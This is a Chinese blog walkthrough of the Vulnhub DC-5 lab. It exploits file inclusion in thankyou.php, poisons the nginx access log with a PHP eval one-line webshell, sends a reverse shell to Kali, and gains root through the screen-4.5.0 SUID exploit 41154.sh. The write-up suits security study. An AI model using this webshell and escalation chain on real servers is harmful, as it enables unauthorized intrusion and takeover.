Vulnhub_DC-5靶机渗透测试

DC-5靶场

image-20230617220445348

信息收集

使用--script=vuln扫描发现了一个thankyou.php界面 感觉会有问题,前往访问网站信息

image-20230617215357276

image-20230617215400667

image-20230617215403828
访问网站

来到thankyou.php界面,发现只是一个普通的界面,但是再次访问的时候,发现下面的标识发生了改变,猜测这个界面存在文件包含,通过刷新来随机访问某一个界面

image-20230617215908573

image-20230617215920595

发现漏洞

察觉到该网站存在文件包含漏洞,但是不存在写shell的方式,只能包含文件来达到获取shell的方法,看来只能够包含日志文件了。

但是接下来要爆破一下读取文件的参数变量才行。使用burp对包含参数进行爆破,读取Linux的密码。

fuzz字典爆破得到访问文件的参数是file 变量=index.php

image-20230617220646719

image-20230617220658429

利用漏洞
  1. 既然如此,该中间件是nginx,只需要访问nginx中间件的日志文件即可构建恶意get请求,来写入shell

image-20230617220836600

  1. 通过搜索的值,日志文件存储在/var/log/nginx/access.log
image-20230617221808251
  1. 构造paylaod进行访问

image-20230617221916669

  1. 发现日志文件末尾有刚才访问请求的记录

image-20230617222031053

  1. 构造恶意的get请求,将shell写入日志中,发现直接构建url传参会进行转义。

image-20230617222404494

  1. 尝试使用burp抓包修改参数进行传入,修改GET传参含有<?php @eval($_POST[a]);?>一句话木马形式,传入到日志文件中。如果查看日志文件中没有这段代码,则成功执行了
image-20230617222947340
  1. 再次尝试蚁剑连接,发现成功连接

image-20230617222835453

  1. 再在网站根目录下上传一个shell文件,再次连接,发现上传和写入失败,来到tmp文件夹内,写入新的shell文件

image-20230617223418212

  1. 尝试连接新shell,成功连接

image-20230617223550273

shell转移
  1. 本地kali虚拟机监听本地端口,等待蚁剑的虚拟终端将shell反弹到主机端口上。反弹成功,优化shell界面

image-20230618201434715

  1. 蚁剑将shell反弹到kali

image-20230618201446589

后渗透信息收集
  1. 上传Linux漏洞探针

image-20230618201746676

  1. 执行该探针文件,查看存在的系统漏洞

image-20230618204125711

  1. 尝试了很多次,每个cve漏洞的利用文件都使用了,发现都执行不成功,应该是缺少某些东西了。看来还是得了解一下这些EXP了

image-20230618204024681

  1. 尝试使用SUID提权,使用find来查看是否有可以suid提权的命令

image-20230618204259910

  1. 据了解scree-4.5.0存在可以利用的漏洞,使用searchsploit查找利用的exp
cp /usr/share/exploitdb/exploits/linux/local/41154.sh  41154.sh
cp /usr/share/exploitdb/exploits/linux/local/41152.txt  41152.txt

image-20230618210559166

image-20230618210618314

  1. 查看.sh文件,发现需要形成两个.c文件,带有编译的命令,还有最后的shell脚本

image-20230618210805231

image-20230618210801950

  1. 41154.sh转换成Linux执行的文件dos2unix 41154.sh 原来的提权文件是window版本的,所以上面执行力很多遍都没有成功。转换成Linux文件后,只需要将41154.sh传入到目标机上,给予执行权限,执行该脚本即可自动提权

image-20230619163635502

  1. 使用wget命令下载POC文件,赋予执行权限,bash 41154.sh发现执行成功,返回了一个#可输入的内容,输入id 发现返回了root权限

image-20230619163444214

  1. 来到root目录下,查看flag文件。成功

bash 41154.sh发现执行成功,返回了一个#可输入的内容,输入id` 发现返回了root权限

[外链图片转存中…(img-z1SCeG9W-1694789906175)]

  1. 来到root目录下,查看flag文件。成功

image-20230619163459839

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值